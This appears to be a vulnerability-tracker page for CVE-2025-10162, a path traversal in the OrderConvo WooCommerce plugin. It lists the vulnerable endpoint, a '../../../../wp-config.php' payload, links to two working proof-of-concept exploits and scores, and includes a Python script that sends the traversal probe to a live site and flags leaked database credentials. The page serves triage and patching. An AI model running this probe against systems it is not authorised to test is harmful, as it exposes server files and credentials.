CVE-2025-10162

Severity: HIGH · Nuclei template available

WooCommerce: OrderConvo <14 - Path Traversal

Title source: llm

Exploitation Summary

EIP tracks 2 public exploits for CVE-2025-10162. PoCs published by Diamorphine, diamorphine666. A Nuclei detection template is also available.

AI-analyzed exploit summary: This exploit demonstrates a path traversal vulnerability in the WordPress OrderConvo plugin (CVE-2025-10162) by crafting a malicious request to the `wp-json/wooconvo/v1/download-file` endpoint, allowing unauthorized file reads (e.g., `wp-config.php`).

Description

The Admin and Customer Messages After Order for WooCommerce: OrderConvo WordPress plugin before version 14 does not validate the path of files requested for download, which allows an unauthenticated attacker to read or download arbitrary files from the server via a path traversal attack.
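As an added triage example (not code from this page, from the plugin, or from either PoC author), the Python helpers below build the unauthenticated probe against the `wp-json/wooconvo/v1/download-file` route named above, classify a response by whether it carries the database `define()` lines of a leaked `wp-config.php`, and show the containment check a patched download handler should apply before serving a file. The query parameter name `file`, the marker strings, the `/srv/www/...` base directory and the `shop.example` host are assumptions; the page does not name the parameter the plugin reads.

```python
"""Offline triage helpers for CVE-2025-10162 (OrderConvo < 14 path traversal).

Added example, not code from the page, the plugin, or either PoC author.
Assumptions (not stated on the page): the vulnerable route reads the file
path from a query parameter named "file", and a leaked wp-config.php is
recognised by its DB_NAME / DB_PASSWORD define() lines.
"""
import os
import re
import sys
import urllib.error
import urllib.request
from urllib.parse import urlencode

ENDPOINT = "wp-json/wooconvo/v1/download-file"   # route named on the page
PARAM = "file"                                   # assumed parameter name
TRAVERSAL = "../../../../wp-config.php"          # payload shape from the page

# Markers that a real wp-config.php contains and an error page does not.
_WP_CONFIG_MARKERS = (
    re.compile(r"define\(\s*['\"]DB_NAME['\"]"),
    re.compile(r"define\(\s*['\"]DB_PASSWORD['\"]"),
)


def build_probe_url(base_url: str, payload: str = TRAVERSAL, param: str = PARAM) -> str:
    """Build the GET request an unauthenticated probe would send."""
    return f"{base_url.rstrip('/')}/{ENDPOINT}?{urlencode({param: payload})}"


def looks_like_wp_config(body: str) -> bool:
    """True if the body carries both database defines of wp-config.php."""
    return all(m.search(body) for m in _WP_CONFIG_MARKERS)


def classify(status: int, body: str) -> str:
    """Turn a probe response into 'leak', 'blocked' or 'inconclusive'."""
    if status == 200 and looks_like_wp_config(body):
        return "leak"
    if status in (400, 403, 404):
        return "blocked"
    return "inconclusive"


def is_path_contained(base_dir: str, requested: str) -> bool:
    """The check the vulnerable handler lacks: resolve the requested file and
    refuse anything outside base_dir (the directory the plugin serves from).
    Both sides go through realpath so '..' segments and symlinks are
    normalised before comparison; an absolute 'requested' is rejected too,
    because os.path.join discards base_dir in that case."""
    base = os.path.realpath(base_dir)
    target = os.path.realpath(os.path.join(base, requested))
    return os.path.commonpath([base, target]) == base


def probe(base_url: str, timeout: float = 10.0) -> str:
    """Send one probe to a live target (network; not exercised offline)."""
    req = urllib.request.Request(
        build_probe_url(base_url),
        headers={"User-Agent": "cve-2025-10162-check"},
    )
    try:
        with urllib.request.urlopen(req, timeout=timeout) as resp:
            body = resp.read(65536).decode("utf-8", "replace")
            return classify(resp.status, body)
    except urllib.error.HTTPError as e:
        return classify(e.code, "")


if __name__ == "__main__":
    if len(sys.argv) == 2:
        print(probe(sys.argv[1]))
    else:
        # Constructed response fragment standing in for a leaked wp-config.php.
        sample = "<?php\ndefine( 'DB_NAME', 'wp' );\ndefine( 'DB_PASSWORD', 'x' );\n"
        print(build_probe_url("https://shop.example"))
        print(classify(200, sample))
        print(is_path_contained("/srv/www/wp-content/uploads/wooconvo", TRAVERSAL))
```

Run it with a base URL as the only argument to probe a target you are authorised to test; with no argument it exercises the constructed sample only. A 200 whose body lacks the markers is reported as inconclusive rather than clean, because such a response does not prove the path was rejected.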

Exploits (2)

exploitdb · WORKING POC
by Diamorphine · python · webapps · multiple
https://www.exploit-db.com/exploits/52607

Classification: Working PoC 95%
Attack Type: Info Leak
Complexity: Trivial
Reliability: Reliable
Target: WordPress OrderConvo plugin v13.5
Auth: none needed
Prerequisites: Target URL · Path traversal sequence (e.g., ../../../../wp-config.php)
Analyzed by devstral-2 on Jun 02, 2026
github · WORKING POC
by diamorphine666 · python · poc
https://github.com/diamorphine666/CVE-2025-10162-Exploit

This is a functional exploit for CVE-2025-10162, a path traversal vulnerability in WordPress OrderConvo plugin versions < 14. It leverages an unauthenticated endpoint to read arbitrary files from the server.

Classification: Working PoC 95%
Attack Type: Info Leak
Complexity: Trivial
Reliability: Reliable
Target: WordPress OrderConvo plugin < 14
Auth: none needed
Prerequisites: Target running vulnerable WordPress OrderConvo plugin · Network access to the target
Analyzed by devstral-2 on May 31, 2026

Nuclei Templates (1)

WordPress OrderConvo < 14 - Path Traversal
HIGH · VERIFIED · by 0x_Akoko

References (1)

Core References (1)
https://wpscan.com/vulnerability/f878615d-955d-4365-87e0-6c928f548986/ (Third Party Advisory · exploit · vdb-entry · technical-description)

Scores

CVSS v3 7.5
EPSS 0.3920
EPSS Percentile 97.4%
Attack Vector NETWORK
CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N

CISA SSVC

Vulnrichment
Exploitation poc
Automatable yes
Technical Impact partial

Details

Status published
Products (1)
Vendor: Unknown · Product: Admin and Customer Messages After Order for WooCommerce: OrderConvo < 14
Published Oct 07, 2025
Tracked Since Feb 18, 2026